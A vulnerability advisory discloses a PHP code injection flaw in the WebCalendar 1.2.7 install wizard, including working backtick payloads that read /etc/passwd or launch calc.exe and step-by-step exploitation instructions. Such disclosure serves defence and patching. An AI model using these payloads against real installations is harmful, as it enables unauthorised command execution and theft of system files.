WebCalendar v1.2.7 PHP Code Injection

[hyp3rlinx () lycos com]

[+] Credits: John Page aka HYP3RLINX    

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-PHP-CODE-INJECTION.txt

[+] ISR: ApparitionSec



Vendor:
==========================
www.k5n.us/webcalendar.php



Product:
==================
WebCalendar v1.2.7

WebCalendar is a PHP-based calendar application that can be configured as a single-user calendar, a multi-user calendar 
for groups of users, or as an
event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2, Interbase, MS SQL Server, or ODBC is required.

WebCalendar can be setup in a variety of ways, such as...

A schedule management system for a single person
A schedule management system for a group of people, allowing one or more assistants to manage the calendar of another 
user
An events schedule that anyone can view, allowing visitors to submit new events
A calendar server that can be viewed with iCalendar-compliant calendar applications like Mozilla Sunbird, Apple iCal or 
GNOME Evolution or RSS-enabled
applications like Firefox, Thunderbird, RSSOwl, FeedDemon, or BlogExpress.



Vulnerability Type:
======================
PHP Code Injection



CVE Reference:
==============
N/A



Vulnerability Details:
=====================

Since WebCalendars install script is not removed after installation as there is no "automatic" removal of it, low 
privileged users can inject arbitrary
PHP code for the "Database Cache" directory value as no input validation exists for this when a user installs the 
application using the WebCalendar walk
thru wizard. 

If WebCalendars installation script is available as part of a default image, often as a convenience by some hosting 
providers, this can be used to gain
code execution on the target system. The only item that is required is the user must have privileges to authenticate to 
the MySQL Database and to run the
install script. So, users who have install wizard access for the WebCalendar application will now have ability to 
launch arbitrary system commands on the
affected host.

One problem we must overcome is WebCalendar filters quotes " so we cannot use code like <?php echo "/bin/cat 
/etc/passwd"; ?> However, we can defeat this
obstacle using the all to forgotten backtick `CMD` operator!.

e.g.

*/?><?php echo `/bin/cat /etc/passwd`; ?>

This results in "settings.php" being injected like...

<?php
/* updated via install/index.php on Wed, 15 Jun 2016 09:44:34 -0400
install_password: e99a18c428cb38d5f260853678922e03
db_type: mysql
db_host: localhost
db_database: intranet
db_login: admin
db_password: abc123
db_persistent: false
db_cachedir: */?><?php echo `/bin/cat /etc/passwd`; ?>
readonly: false
user_inc: user.php
use_http_auth: false
single_user: false
# end settings.php */
?>



Exploitation steps(s):
=====================

1) Login to the WebCalendar Installation Wizard.

2) When you get to WebCalendar Installation Wizard Step 2 of the install script.
http://localhost/WebCalendar-1.2.7/WebCalendar-1.2.7/install/index.php?action=switch&page=2

3) Click "Test Settings" button to ensure connection to the Database.
4) Enter  below PHP code for the "Database Cache Directory:" input fields value to pop calculator for POC (Windows).

 */?><?php exec(`calc.exe`); ?>

5) Click "Next" button
6) Click "Next" button 
7) Click "Save settings" button

BOOOOOOOM! "settings.php" gets overwritten and injected with our PHP code.

If you happen to get following error when clicking "Test Settings" button, "Failure Reason: Database Cache Directory 
does not exist", just click back
button then forward or just "Test settings" button again to try get past the error.


Disclosure Timeline:
===============================
Vendor Notification:  No Replies
July 4, 2016 : Public Disclosure



Severity Level:
================
8.0 (High)
CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use 
or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by 
reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided 
that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no 
responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security 
related information
or exploits by the author or elsewhere.

HYP3RLINX